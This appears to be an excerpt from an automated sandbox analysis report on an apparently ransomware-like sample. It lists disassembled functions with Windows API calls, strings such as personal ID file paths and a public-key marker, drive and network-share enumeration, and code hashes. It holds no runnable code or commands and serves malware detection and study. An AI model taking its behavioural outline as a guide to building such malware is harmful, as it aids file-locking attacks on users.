                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        • Opcode ID: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction ID: 44199bf613038b18c8776fa5ec87ec5ced6d82209fcef71c2be32d9a9e6e668d
                                                                                                        • Opcode Fuzzy Hash: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction Fuzzy Hash: 77015231448396ABDA30DF209C05BDF7BD9AF51754F144819F98496182EB749208E797
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,00F2EE2F), ref: 00F21B1E
                                                                                                        • timeGetTime.WINMM(?,?,00F2EE2F), ref: 00F21B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F21B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B6A
                                                                                                        • Sleep.KERNEL32(00000064,?,?,00F2EE2F), ref: 00F21B72
                                                                                                        • timeGetTime.WINMM(?,?,00F2EE2F), ref: 00F21B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        • Opcode ID: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction ID: db0b7afb62c0997a1d282909b7cb5e2869b32df70cd30b343d839163da3ca3cd
                                                                                                        • Opcode Fuzzy Hash: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction Fuzzy Hash: FB017132E41329AADB20ABB59C45FEDB778BB48B50F044066E700A7190E660A901DBE9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C539
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: e70130d3ad5c3903555579e6447ec48f79e35919415c7f38d915ac85ecc04490
                                                                                                        • Instruction ID: d0edd10374fbd2b04a3b07717554d99062ca34f37a3dafc09ee5408b7ee04a53
                                                                                                        • Opcode Fuzzy Hash: e70130d3ad5c3903555579e6447ec48f79e35919415c7f38d915ac85ecc04490
                                                                                                        • Instruction Fuzzy Hash: C1110AB2A8122833ED30B1696C47FDB735D9B41731F0001A6FE0C97182E56A965561E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F2BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F2BAC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        • Opcode ID: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction ID: 656556434878a33a83f29fa8906d3c169d9c7d287aac0b043c1d02711a598f6a
                                                                                                        • Opcode Fuzzy Hash: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction Fuzzy Hash: E4E09A316C272576F2315B257C0AF963655B706F21F31405AFA407D2C486E96841DADC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F20C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00F20C39
                                                                                                        • _memset.LIBCMT ref: 00F20C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F20C63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        • Opcode ID: bd82fdccd09961c100a931dbbab8bc29bb1c13ebef7ae7696a7c3c1039dbb15d
                                                                                                        • Instruction ID: 614b04ef304044e59196c1b4a91d81f28cf4621f544f7edd5039005957690a10
                                                                                                        • Opcode Fuzzy Hash: bd82fdccd09961c100a931dbbab8bc29bb1c13ebef7ae7696a7c3c1039dbb15d
                                                                                                        • Instruction Fuzzy Hash: 6C91D576A083418FD728DF68D891B6BB7E1FFC4714F14891DF48A87282EB74A940DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        • Opcode ID: 2157752792d419211f4dab69da76b3e0a61ed665629d50eec0a91afd9fc51035
                                                                                                        • Instruction ID: 4528dab7ec18181b1be229a1f4ce72e9b8f0e8b023a05a9e869841815360edb5
                                                                                                        • Opcode Fuzzy Hash: 2157752792d419211f4dab69da76b3e0a61ed665629d50eec0a91afd9fc51035
                                                                                                        • Instruction Fuzzy Hash: 084112725083409FC710DF68D885B0BBBE5FB89728F400A2DF085972A2DBB9C644CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F32130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        • Opcode ID: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                                                                                                        • Instruction ID: 6b04a34bbd2873d8765df42fda4d6249fb269ab3b4ef55685d754093947a67d6
                                                                                                        • Opcode Fuzzy Hash: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                                                                                                        • Instruction Fuzzy Hash: 5B51CE31E007059BEBA89FA9CD80A6FB7B1AF41330F248729F935962D0D774DE50AB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00F1F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F1F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F1F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F1F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        • Opcode ID: 5456c193392749edc5a039dd98931bb9961d90a8599acb38c0e8cbedd12162fe
                                                                                                        • Instruction ID: b983a824017ffa3cc3f3dc154d6d185116fb7a2b2f2c4ac8d9564aeb05f51ca6
                                                                                                        • Opcode Fuzzy Hash: 5456c193392749edc5a039dd98931bb9961d90a8599acb38c0e8cbedd12162fe
                                                                                                        • Instruction Fuzzy Hash: 7D312232A00209FBDB049F68CC4ABEE7B79EB05714F508129F805A71C0D775AA89DBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F2B1BA
                                                                                                          • Part of subcall function 00F211C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F2120F
                                                                                                          • Part of subcall function 00F211C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F21228
                                                                                                          • Part of subcall function 00F211C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2123D
                                                                                                          • Part of subcall function 00F211C0: MoveFileW.KERNEL32(00000000,?), ref: 00F21277
                                                                                                          • Part of subcall function 00F2BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                          • Part of subcall function 00F2BA10: RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                          • Part of subcall function 00F2BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F2B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2B4D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: 1f00aa5180d634e5ab102d6b37926694b65091357843f1aa0ef049792a71eaa4
                                                                                                        • Instruction ID: b4cd53832a4b4917778b0a535cd20697718324d844a971e01dcf81abe3ab5a0a
                                                                                                        • Opcode Fuzzy Hash: 1f00aa5180d634e5ab102d6b37926694b65091357843f1aa0ef049792a71eaa4
                                                                                                        • Instruction Fuzzy Hash: 985137715142549BC718FB60EC52AEFB7A8BF94344F80491DF886431A2EF3CA619DBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 1ccea5e049b642754fcbd3c0465633aec1342f9e74e8bc9a89e2d73643b9eae1
                                                                                                        • Instruction ID: b987bced7b68c86a169a4428d9dca62998358cf9978f9389f99ea70dd60efbff
                                                                                                        • Opcode Fuzzy Hash: 1ccea5e049b642754fcbd3c0465633aec1342f9e74e8bc9a89e2d73643b9eae1
                                                                                                        • Instruction Fuzzy Hash: 7B112772E803159BDF31DF68DC523CE77A0AF10724F040529EC5952181E77A9A94ABC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F30CF4 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331135983-0
                                                                                                        • Opcode ID: 198831a7471d0cb7e7d94a282bb09a097bc31cae652b5b534385d01b84d7cc8d
                                                                                                        • Instruction ID: b4281f8e31eaa6bf492232a9af70709b13b2b589b565986f3dcb84022bcba3da
                                                                                                        • Opcode Fuzzy Hash: 198831a7471d0cb7e7d94a282bb09a097bc31cae652b5b534385d01b84d7cc8d
                                                                                                        • Instruction Fuzzy Hash: B811A332901F145AD6256BB88C6276E3790AF42B34F28874AF4759B1C2CF3CAA43A751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F33B64
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • std::exception::exception.LIBCMT ref: 00F33B82
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F33B97
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 3074076210-0
                                                                                                        • Opcode ID: 9cd4fbcd253e25c62f3a82a700930f321697d9d42e18c2a316fe6f9f103f8c46
                                                                                                        • Instruction ID: 583ee72d6aff0cf4bac3cead09cb545e3c900df938a617aab41e6c14f1315b60
                                                                                                        • Opcode Fuzzy Hash: 9cd4fbcd253e25c62f3a82a700930f321697d9d42e18c2a316fe6f9f103f8c46
